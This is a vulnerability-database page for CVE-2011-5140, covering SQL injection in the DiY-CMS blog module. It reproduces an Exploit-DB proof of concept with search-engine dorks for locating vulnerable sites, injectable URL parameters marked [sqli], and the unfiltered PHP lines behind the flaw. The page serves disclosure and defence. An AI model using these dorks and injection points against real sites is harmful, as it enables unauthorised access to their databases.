CVE-2011-5140
Description
Multiple SQL injection vulnerabilities in the blog module 1.0 for DiY-CMS allow remote attackers to execute arbitrary SQL commands via the (1) start parameter to (a) tags.php, (b) list.php, (c) index.php, (d) main_index.php, (e) viewpost.php, (f) archive.php, (g) control/approve_comments.php, (h) control/approve_posts.php, and (i) control/viewcat.php; and the (2) month and (3) year parameters to archive.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
DIY-CMS blog mod - SQL Injection
# Exploit Title: DIY-CMS blog mod SQL Injection
# Author: snup
# Contact: snup.php@gmail.com
# Site: http://e-o-u.org
SQL Injection:
DORK:
inurl:"mod.php?mod=blog" intext:"powered by DIY-CMS"
inurl:"mod.php?mod=blog"
BUG:
http://127.0.0.1/diy-cms/mod.php?mod=blog&modfile=tags&tag=features&start=[sqli]
http://127.0.0.1/diy-cms/mod.php?mod=blog&start=[sqli]
http://127.0.0.1/diy-cms/mod.php?mod=blog&modfile=archive&month=[sqli]
http://127.0.0.1/diy-cms/mod.php?mod=blog&modfile=archive&month=8&year=[sqli]
http://127.0.0.1/diy-cms/mod.php?mod=blog&modfile=list&catid=4&start=[sqli]
http://127.0.0.1/diy-cms/mod.php?mod=blog&modfile=archive&month=8&year=2&start=[sqli]
http://127.0.0.1/diy-cms/mod.php?mod=blog&modfile=viewpost&blogid=26&start=[sqli]
Why?:
The variables $start, $year, $month are not filtered
In file: /modules/blog/tags.php , list.php , index.php ,
main_index.php , viewpost.php
$start =(!isset($_GET['start'])) ? '0' : $_GET['start'];
In file: /modules/blog/archive.php
$start =(!isset($_GET['start'])) ? '0' : $_GET['start'];
$month =(!isset($_GET['month'])) ?
error_msg($lang['ARCHIVE_NO_MONTH_SPECIFIED']) : $_GET['month'];
$year =(!isset($_GET['year'])) ?
error_msg($lang['ARCHIVE_NO_YEAR_SPECIFIED']) : $_GET['year'];
In file: /modules/blog/control/approve_comments.php ,
approve_posts.php , viewcat.php
$start =(!isset($_GET['start'])) ? '0' : $_GET['start'];
###########
# Gr33tz: #
#####################################################
# agilob, cOnd, czoik, drummachina, gocys, prick #
# im2ee, MadCow, n1k0n3r, R3w, rtgn, SiD, vizzdoom #
# irc.freenode.net #pakamera , http://e-o-u.org #
#####################################################References
- http://secunia.com/advisories/47337
- http://www.exploit-db.com/exploits/18288
- http://www.osvdb.org/78071
- http://www.osvdb.org/78080
- http://www.osvdb.org/78081
- http://www.osvdb.org/78082
- http://www.osvdb.org/78083
- https://exchange.xforce.ibmcloud.com/vulnerabilities/72022
- http://secunia.com/advisories/47337
- http://www.exploit-db.com/exploits/18288
- http://www.osvdb.org/78071
- http://www.osvdb.org/78080
- http://www.osvdb.org/78081
- http://www.osvdb.org/78082
- http://www.osvdb.org/78083
- https://exchange.xforce.ibmcloud.com/vulnerabilities/72022
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.